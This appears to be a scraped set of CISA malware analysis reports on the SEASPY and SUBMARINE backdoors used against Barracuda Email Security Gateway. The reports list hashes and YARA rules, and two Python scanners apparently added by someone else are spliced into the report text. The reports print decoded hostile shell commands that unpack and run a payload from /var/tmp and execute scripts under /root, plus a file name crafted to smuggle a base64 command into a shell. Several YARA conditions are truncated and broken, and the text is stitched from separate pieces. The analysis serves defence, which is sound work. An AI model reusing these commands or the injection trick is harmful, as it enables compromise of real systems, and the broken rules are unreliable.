  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

July 28, 2023

MAR-10454006-r2.v1 SEASPY Backdoor | CISA

Summary

Description

CISA obtained two SEASPY malware samples. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service “BarracudaMailService” that allows the threat actors to execute arbitrary commands on the ESG appliance.

For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-209B PDF (PDF, 354.36 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-209B JSON (JSON, 19.83 KB )
Submitted Files (2)

3e21e547cf94cb07c010fe82d6965e5bd52dbdd9255b4dd164f64addfaa87abb (BarracudaMailService.1)

69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192 (6931018-BarracudaMailService.2)

Findings

69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192

Tags

trojan

Details

Name 6931018-BarracudaMailService.2
Size 2924089 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=495062eaa63784dad0a098d58892f58deb47ea66, with debug_info, not stripped
MD5 5d6cba7909980a7b424b133fbac634ac
SHA1 d114a707fc6abbd8060f821893a9ee64dc3b2714
SHA256 69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192
SHA512 ef966e1d679daa44ee4c86848b71a0be27a79c8824eba8e74c866322e59a8bdce66b32f3d4417256af351f87dd149a73ed7e8e40df5794c5273cf029d04b6f25
ssdeep 49152:IaMq45lHsbhe9YBU80A3hvJeD7ANjQ4maMTFhmwzHPm0WhphC:oqJh4YWkLeDKOhmwa0WhphC
Entropy 6.165718
Malware Result unknown
Antivirus
ESET a variant of Linux/SeaSpy.A trojan
McAfee Linux/Seaspy!5D6CBA790998
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
ssdeep Matches

No matches found.

Description

This artifact is a 64-bit ELF file that has been identified as a "SEASPY" malware variant installed as a system service. The sample is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. It is designed to listen for commands from the Threat Actor's (TA) Command-and-Control (C2) server, received as Transmission Control Protocol (TCP) packets. When executed, the malware uses a libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks each captured network packet for the hard-coded string "oXmp". Note: This hard-coded string may change for other SEASPY variants. When the right sequence of packets is captured, it establishes a TCP reverse shell to the TA's C2 server for further exploitation, allowing the TA to execute arbitrary commands on the compromised system.

The malware is based on an open-source backdoor program named "cd00r" and it is executed using the parameter below:

--Begin argument--
Usage: "./BarracudaMailService <Network-Interface>"
Sample: "./BarracudaMailService eth0"
--End argument--

Screenshots
Figure 1

Figure 1. - This is disassembler output showing how the malware checks the parameters that the malware was executed with.

3e21e547cf94cb07c010fe82d6965e5bd52dbdd9255b4dd164f64addfaa87abb

Tags

trojan

Details

Name BarracudaMailService.1
Size 2924089 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=41942e680be29136ce7f1cdc9a15fd43968b0db0, with debug_info, not stripped
MD5 32ffe48d1a8ced49c53033eb65eff6f3
SHA1 2c7ad0e7897f348bec2e32f2af4282bd65916f8d
SHA256 3e21e547cf94cb07c010fe82d6965e5bd52dbdd9255b4dd164f64addfaa87abb
SHA512 12fd230c78c9e14b1bbb7f3c6776a14710693fa4224b4376775f118fc35584a5946a57dda43db20bd9ffc2950f4e62e8c206506744bca5fe39e6cb9a1a91b981
ssdeep 49152:bgt0bmh2EXaRuFmK3cnlBceICm4ewQ/MTs/dgPm0WhphC:Ma0gug7bceI4ih/dp0WhphC
Entropy 6.165197
Malware Result unknown
Antivirus
ESET a variant of Linux/SeaSpy.A trojan
McAfee Linux/Seaspy!32FFE48D1A8C
YARA Rules
  • rule CISA_10452108_01 : SEASPY backdoor communicates_with_c2 installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10452108"
           Date = "2023-06-20"
           Last_Modified = "20230628_1000"
           Actor = "n/a"
           Family = "SEASPY"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           Description = "Detects malicious Linux SEASPY samples"
           SHA256_1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
           SHA256_2 = "69935a1ce0240edf42dbe24535577140601bcf3226fa01e4481682f6de22d192"
           SHA256_3 = "5f5b8cc4d297c8d46a26732ae47c6ac80338b7be97a078a8e1b6eefd1120a5e5"
           SHA256_4 = "10efa7fe69e43c189033006010611e84394569571c4f08ea1735073d6433be81"
       strings:
           $s0 = { 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6c 53 65 72 76 69 63 65 20 65 74 68 30 }
           $s1 = { 75 73 61 67 65 3a 20 2e 2f 42 61 72 72 61 63 75 64 61 4d 61 69 6C 53 65 72 76 69 63 65 20 3c 4e 65 74 77 6f 72 6b 2d 49 6e 74 65 72 66 61 63 65 }
           $s2 = { 65 6e 74 65 72 20 6f 70 65 6e 20 74 74 79 20 73 68 65 6c 6c }
           $s3 = { 25 64 00 4e 4f 20 70 6f 72 74 20 63 6f 64 65 }
           $s4 = { 70 63 61 70 5f 6c 6f 6f 6b 75 70 6e 65 74 3a 20 25 73 }
           $s5 = { 43 68 69 6c 64 20 70 72 6f 63 65 73 73 20 69 64 3a 25 64 }
           $s6 = { 5b 2a 5d 53 75 63 63 65 73 73 21 }
           $a7 = { bf 90 47 90 ec 18 fe e3 83 e2 a9 f7 8d 85 18 1d }
           $a8 = { 81 35 1e f0 94 ab 2a ba 5d f0 37 76 69 19 9f 1e }
           $a9 = { 6a 8e c7 89 ce c1 fe 64 78 a6 e1 c5 fe 03 d1 a7 }
           $a10 = { c2 ff d1 0d 24 23 ec c0 57 f9 8d 4b 05 34 41 b8 }
       condition:
           uint32(0) == 0x464c457f and (all of ($s*)) or ( all of ($a*))
    }
ssdeep Matches

No matches found.

Description

This artifact is a 64-bit ELF file that has been identified as a "SEASPY" malware variant installed as a system service. This sample has the same malicious capabilities as BarracudaMailService.2 (5d6cba7909980a7b424b133fbac634ac). The only difference between the binaries is in the function named "start_pcap_listener". In that function both binaries call a function named "reverse shell" to start the malware's reverse shell functionality. The difference is that BarracudaMailService.1 (32ffe48d1a8ced49c53033eb65eff6f3) jumps directly to the set of instructions that start the reverse shell, whereas BarracudaMailService.2 (5d6cba7909980a7b424b133fbac634ac) contains an extra set of instructions before jumping to the instructions that start the reverse shell.

Acknowledgments

Mandiant contributed to this report.

July 28, 2023

MAR-10454006-r1.v2 SUBMARINE Backdoor | CISA

Summary

Description

CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 - 9.2.0.006 of Barracuda Email Security Gateway (ESG).

SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process, enable execution with root privileges, persistence, command and control, and cleanup. In addition to SUBMARINE, CISA obtained associated Multipurpose Internet Mail Extensions (MIME) attachment files from the victim. These files contained the contents of the compromised SQL database, which included sensitive information.

For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-209A PDF (PDF, 1.18 MB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-209A JSON (JSON, 48.51 KB )
Submitted Files (5)

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0 (r)

81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab (libutil.so)

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239 (machineecho_-n_Y2htb2QgK3ggL3J...)

b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43 (sedO4CWZ9)

cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a (smtpctl)

Additional Files (2)

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5 (config.TRG)

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a (run.sh)

Findings

2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5

Details

Name config.TRG
Size 5465 bytes
Type ASCII text, with very long lines
MD5 d03e1f112f0c784a39003e0b3992ad80
SHA1 447369281ba26b7a6da4f659aa31026605aa3c6f
SHA256 2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5
SHA512 aead33a656f647d58da0a7f5240eb8cd7c0121c9ea33ae6504687b5faf21779e67b659a93987392033ea8ae2aae239e432444dcddad52f2a8665add7265902f6
ssdeep 96:CjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIz2mN:CjXDN0wSWQp08UpsmFm4mhCm
Entropy 6.062477
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_06 : SUBMARINE trojan backdoor cleans_traces_of_infection hides_artifacts installs_other_components
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-11"
           Last_Modified = "20230727_1200"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "cleans-traces-of-infection hides-artifacts installs-other-components"
           Malware_Type = "trojan backdoor"
           Tool_Type = "unknown"
           Description = "Detects SUBMARINE SQL trigger samples"
           SHA256_1 = "2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5"
       strings:
           $s1 = { 54 52 49 47 47 45 52 }
           $s2 = { 43 52 45 41 54 45 }
           $s3 = { 53 45 4c 45 43 54 20 22 65 63 68 6f 20 2d 6e }
           $s4 = { 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
           $s5 = { 72 6f 6f 74 }
           $s6 = { 53 45 54 }
           $s7 = { 45 4e 44 20 49 46 3b }
           $s8 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 43 33 42 55 }
           $s9 = { 2f 76 61 72 2f 74 6d 70 2f 72 }
           $s10 = { 2f 72 6f 6f 74 2f 6d 61 63 68 69 6e 65 }
       condition:
       filesize }
ssdeep Matches

No matches found.

Description

The file 'config.TRG' is a SUBMARINE artifact. The presence of the filename 'config.TRG' alone does not indicate that the ESG is infected; it is the contents of the file that determine whether it is. The contents of 'config.TRG' are contained within the SQL database file called 'config.snapshot' and within the MIME attachments. The presence of the contents of 'config.TRG' within the SQL database is indicative of a SUBMARINE infection.

The file contains a malicious SQL trigger called ‘cuda_trigger’ (Figure 1). This SQL trigger is set to run as root on the local host before a row is deleted from the database. After the trigger parameters are met, two actions occur. First a compressed, base64 encoded blob containing 2 files is written into a file called ‘r’ in the ‘/var/tmp’ directory (Figure 2). Second, a base64 encoded command is executed (Figure 3).

--Begin Base64 Decoded Command--
cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh >/dev/null 2>&1 &
rm -f /root/machine` *chmod +x /root/mac*
sh /root/mach*`*
--End Base64 Decoded Command--

The commands decode the base64 encoded string and execute the decoded result as a shell command. They pass the contents of the file 'r' to be base64-decoded and then decompressed with the 'tar' command. Then, the file 'run.sh' is executed via 'nohup', which allows the process launched from the shell to keep running even after the shell is closed. The 'BSMTP_ID' is passed, and all output and errors are redirected to '/dev/null' and discarded. Lastly, '/root/machine' is removed, permissions on '/root/mac*' are set to executable, and shell scripts in the root directory whose names contain the string 'mach*' are executed.
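A triage helper modelled on the structure described above, as an added example that is not part of the CISA report: it scans a SQL dump for trigger definitions whose body pipes a base64 string into 'sh' (the 'echo -n ... | base64 -d | sh' pattern the rule's YARA strings also key on), records who the trigger runs as and when it fires, and decodes the embedded command so an analyst can read it without running anything. The SQL text, table and trigger names below are constructed; the decoded command in the sample is a harmless echo, not the report's payload.

```python
"""
Triage helper for SQL dumps: find trigger definitions that pipe a base64
string into a shell and decode the embedded command for the analyst.
Added example, not part of the CISA report; SAMPLE_DUMP below is constructed.
"""
import base64
import re

# CREATE [DEFINER=...] TRIGGER name {BEFORE|AFTER} {INSERT|UPDATE|DELETE} ON table
# FOR EACH ROW <body> END   (MySQL-style definitions as found in a dump)
TRIGGER_RE = re.compile(
    r"CREATE\s+(?:DEFINER\s*=\s*(?P<definer>\S+)\s+)?TRIGGER\s+`?(?P<name>\w+)`?\s+"
    r"(?P<timing>BEFORE|AFTER)\s+(?P<event>INSERT|UPDATE|DELETE)\s+ON\s+`?(?P<table>\w+)`?\s+"
    r"FOR\s+EACH\s+ROW\s+(?P<body>.*?)\bEND\b",
    re.IGNORECASE | re.DOTALL,
)
# The 'echo -n <base64> | base64 -d | sh' pipeline described in the report.
B64_EXEC_RE = re.compile(
    r'echo\s+-n\s+["\']?(?P<b64>[A-Za-z0-9+/=]+)["\']?\s*\|\s*base64\s+-d\s*\|\s*sh\b',
    re.IGNORECASE,
)


def decode_b64_command(blob):
    """Decode a base64 blob to text; None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def find_shell_triggers(sql_text):
    """One finding per trigger whose body contains the base64-to-shell pipeline."""
    findings = []
    for trig in TRIGGER_RE.finditer(sql_text):
        commands = [decode_b64_command(m.group("b64"))
                    for m in B64_EXEC_RE.finditer(trig.group("body"))]
        if not commands:
            continue
        findings.append({
            "trigger": trig.group("name"),
            "definer": (trig.group("definer") or "").replace("`", ""),  # e.g. root@localhost
            "fires_on": f"{trig.group('timing').upper()} {trig.group('event').upper()}",
            "table": trig.group("table"),
            "decoded_commands": commands,
        })
    return findings


# Constructed sample dump: one benign audit trigger and one trigger that carries
# a base64-encoded shell command (a harmless echo here, encoded at import time).
_DECOY_B64 = base64.b64encode(b"echo 'constructed sample'").decode("ascii")
SAMPLE_DUMP = f"""
DELIMITER //
CREATE TRIGGER `audit_trigger` AFTER INSERT ON `config` FOR EACH ROW
BEGIN
    INSERT INTO audit_log (msg) VALUES ('row added');
END //
CREATE DEFINER=`root`@`localhost` TRIGGER `suspicious_trigger` BEFORE DELETE ON `config` FOR EACH ROW
BEGIN
    SET @cmd = "echo -n {_DECOY_B64} | base64 -d | sh";
END //
DELIMITER ;
"""

if __name__ == "__main__":
    for finding in find_shell_triggers(SAMPLE_DUMP):
        print(finding)
```

On a real export, pass the dump text to find_shell_triggers() and review each decoded command by hand; a trigger defined as root that fires BEFORE DELETE and shells out is the shape this report describes, and the decoder only reads the base64, it never executes it.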

Screenshots
Figure 1. - The malicious SQL trigger called 'cuda_trigger'.

Figure 2. - A small snippet of the base64 blob being written into the file 'r'.

Figure 3. - A small snippet of the base64 encoded command found after 'r' is written.

8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239

Details


Name machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh
Size 202 bytes
Type ASCII text
MD5 c5c93ba36e079892c1123fe9dffd660f
SHA1 e1df0da64a895ff00fc27a41898aa221b5b7d926
SHA256 8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239
SHA512 a07e79b99e02fa52ab5ab75fc2d989d35d4b360a57fdf0ec5569f445fe1820d26915adbd4f30e3a9126e5cabcde9ca840779039393c39e5838618f06db47a4cc
ssdeep 3:jT81L9RUjD+rlczyX837QTa0NDO9Z8giofQHcQMHL6wF8ufIhW0TaT7ZsNvn:c1JRID+pc2XS7Ga0yYgC3GLX8Q0TaRsv
Entropy 5.481015
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_07 : SUBMARINE trojan dropper exploit_kit evades_av hides_executing_code hides_artifacts exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-11"
           Last_Modified = "20230711_1830"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "evades-av hides-executing-code hides-artifacts"
           Malware_Type = "trojan dropper exploit-kit"
           Tool_Type = "exploitation"
           Description = "Detects ESG FileName exploit samples"
           SHA256 = "8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239"
       strings:
           $s1 = { 7c 20 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }
           $s2 = { 65 63 68 6f 20 2d 6e }
           $s3 = { 59 32 46 30 49 43 39 32 59 58 49 76 64 47 31 77 4c 33 49 67 66 43 42 69 59 58 4e 6c 4e 6a 51 67 4c 57 51 67 4c 57 6b 67 66 43 42 30 59 58 49 67 }
       condition:
           filesize }
ssdeep Matches

No matches found.

Description

The file 'machineecho -n Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK _ base64 -d _sh`_' is a SUBMARINE artifact. The file is a shell script identified in the '/root' directory and contains base64 encoded commands. The name of the file is designed to exploit a vulnerability on the target environment where the base64 string within the file name will be executed on the Linux shell.

--Begin Base64 Decoded Name/Command--
chmod +x /root/mac*
sh /root/mach*`*
--End Base64 Decoded Name/Command--

The above commands will change the permissions of the directory, '/root/mac*', to executable.

The file contains a series of operations, such as decoding a base64 encoded string and executing the decoded result as a shell command. The decoded base64 string represents a series of commands that will be executed by the shell.

~Begin Base64 Decoded Command~

cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp
nohup bash /var/tmp/run.sh    >/dev/null 2>&1 &
rm -f /root/machine`*

~End Base64 Decoded Command~

This command is identical to the decoded base64 commands found in the SQL trigger identified in the file 'config.snapshot'.
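Both encodings the report describes, the base64 command carried in the 'cuda_trigger' body and the base64 command carried in the 'machineecho ...' filename, can be pulled out and inspected with a small decoder. The following is an added example, not CISA's tooling: the trigger definition is a constructed stand-in (the report shows only the decoded command, not the trigger body), the filename is the one the report lists, and the list of flagged shell traits is my own.

```python
import base64
import binascii
import re

# Decoded command as the report lists it (first two lines of the trigger's
# payload); used here only to build the constructed sample trigger below.
TRIGGER_COMMAND = (
    "cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp\n"
    "nohup bash /var/tmp/run.sh >/dev/null 2>&1 &\n"
)
ENCODED_TRIGGER_COMMAND = base64.b64encode(TRIGGER_COMMAND.encode()).decode()

# Constructed stand-in for the trigger definition inside a 'config.snapshot'
# dump. Only the shape is modelled: a BEFORE DELETE trigger that hands a
# base64 blob to 'base64 -d | sh'.
SAMPLE_SNAPSHOT = (
    "CREATE TRIGGER `cuda_trigger` BEFORE DELETE ON `config` FOR EACH ROW\n"
    "BEGIN\n"
    f"  SET @cmd = CONCAT('echo -n {ENCODED_TRIGGER_COMMAND} | base64 -d | sh');\n"
    "END\n"
)

# The filename-borne artifact as the report lists it (underscores stand in
# for the shell metacharacters of the original name).
SAMPLE_FILENAME = (
    "machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh"
)

# A run of 24+ base64 alphabet characters with optional padding.
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Traits of the decoded commands described in the report; labels are mine.
SUSPICIOUS = [
    ("base64 payload piped to a shell", re.compile(r"base64\s+-d\b[^\n|]*\|\s*(?:sh|bash)\b")),
    ("archive unpacked into /var/tmp", re.compile(r"tar\s+-zx\b[^\n]*-C\s+/var/tmp")),
    ("script detached with nohup", re.compile(r"nohup\s+(?:bash|sh)\s+\S+")),
    ("chmod +x under /root", re.compile(r"chmod\s+\+x\s+/root/")),
    ("LD_PRELOAD set", re.compile(r"LD_PRELOAD=")),
]


def decode_base64_tokens(text):
    """Return (token, decoded_text) for each base64-looking run in 'text'
    that decodes cleanly to printable ASCII (newlines and tabs allowed)."""
    found = []
    for match in BASE64_TOKEN.finditer(text):
        token = match.group(0)
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\r\t" for ch in decoded):
            found.append((token, decoded))
    return found


def scan_text(text):
    """Scan 'text' plus every base64 layer it embeds; return findings as
    'label (layer)' strings in document order."""
    findings = []
    if re.search(r"CREATE\s+TRIGGER\s+`?cuda_trigger`?", text, re.IGNORECASE):
        findings.append("trigger named cuda_trigger (text)")
    layers = [("text", text)]
    layers += [("decoded", decoded) for _, decoded in decode_base64_tokens(text)]
    for layer, body in layers:
        for label, pattern in SUSPICIOUS:
            if pattern.search(body):
                findings.append(f"{label} ({layer})")
    return findings


if __name__ == "__main__":
    for name, sample in (("config.snapshot", SAMPLE_SNAPSHOT), ("filename", SAMPLE_FILENAME)):
        print(name)
        for finding in scan_text(sample):
            print("   ", finding)
```

Running the same scanner over a real 'config.snapshot' dump surfaces any trigger that embeds a decode-and-execute pipeline, not just one named 'cuda_trigger'.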

6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0

Details


Name r
Size 4857 bytes
Type ASCII text, with very long lines
MD5 03e07c538a5e0e7906af803a83c97a1e
SHA1 600452b1cff8d99e41093be8b68f62e7c85f23d7
SHA256 6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0
SHA512 a4a6257dd6f859ae58de3b46879926ce99e3e3edb16db37dc80da4975f5a2866f4cd722233b98c9553e319e61661cae98d535ccb26d8c9709cf6f2efa56b9b3f
ssdeep 96:pjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIZ:pjXDN0wSWQp08UpsmFm4mhCC
Entropy 5.988140
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_02 : SUBMARINE trojan backdoor exploitation hides_artifacts prevents_artifact_access
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-06-29"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "hides-artifacts prevents-artifact-access"
           Malware_Type = "trojan backdoor"
           Tool_Type = "exploitation"
           Description = "Detects encoded GZIP archive samples"
           SHA256_1 = "6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0"
       strings:
           $s1 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 }
           $s2 = { 44 44 44 41 67 50 39 2f 2b 43 38 47 70 2f 36 63 41 46 41 41 41 41 3d 3d 0a}
           $s3 = { 37 56 4d 70 56 58 4f 37 2b 6d 4c 39 78 2b 50 59 }
       condition:
           filesize 5.8)
    }
ssdeep Matches

No matches found.

Relationships
6dd8de093e... Contains 81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab
6dd8de093e... Contains bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
Description

The file 'r' is a SUBMARINE artifact. The file is a Base64 encoded GNU Zip (GZIP) archive. When the 'cat /*/*/r | base64 -d -i | tar -zx -C /*/*' Linux Shell command is applied to 'r', it decompresses two files. The aforementioned Linux Shell command is contained in 'config.snapshot' as a Base64 encoded SQL trigger.

--Begin Decompressed Files--
1. run.sh (bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a)
2. libutil.so (81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab)
--End Decompressed Files--

bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a

Details


Name run.sh
Size 473 bytes
Type POSIX shell script, ASCII text executable
MD5 c2e577c71d591999ad5c581e49343093
SHA1 d446e06e40053214788aa1bad17b6d3587a2a370
SHA256 bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a
SHA512 ffe528fcb448424b1f811a4b9068402971bf2705ad64e556071a062cd89d74d371d3ef41afca38450b7d8457611246a6ba35478dfc83e997950d2f85c8dac80f
ssdeep 12:avOAsp2yBXGTVjnJAIFw/J7G80ZWkbUErPzg:azsphBXSFZFwgLWkXg
Entropy 5.323635
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_03 : SUBMARINE trojan backdoor loader rootkit virus controls_local_machine hides_artifacts infects_files installs_other_components remote_access exploitation information_gathering
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-03"
           Last_Modified = "20230711_1500"
           Actor = "n/a"
           Family = "SUBMARINE"
           Capabilities = "controls-local-machine hides-artifacts infects-files installs-other-components"
           Malware_Type = "trojan backdoor loader rootkit virus"
           Tool_Type = "remote-access exploitation information-gathering"
           Description = "Detects SUBMARINE launcher script samples"
           SHA256_1 = "bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a"
       strings:
           $s1 = { 73 65 64 20 2d 69 }
           $s2 = { 4c 44 5f 50 52 45 4c 4f 41 44 3d }
           $s3 = { 6c 69 62 75 74 69 6c 2e 73 6f }
           $s4 = { 2f 73 62 69 6e 2f 73 6d 74 70 63 74 6c }
           $s5 = { 2f 62 6f 6f 74 2f 6f 73 5f 74 6f 6f 6c 73 }
           $s6 = { 72 6d 20 2d 72 66 }
           $s7 = { 62 61 73 65 36 34 20 2d 64 }
           $s8 = { 7c 73 68 }
           $s9 = { 72 65 73 74 61 72 74 }
           $s10 = { 2f 64 65 76 2f 6e 75 6c 6c }
           $s11 = { 23 21 20 2f 62 69 6e 2f 73 68 }
           $s12 = { 62 61 73 65 36 34 }
       condition:
           filesize }
  • rule CISA_10454006_04 : SUBMARINE trojan backdoor hides_artifacts hides_executing_code infects_files installs_other_components remote_access exploitation
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10454006"
           Date = "2023-07-05"
           Last_Modified = "20230711_1500"
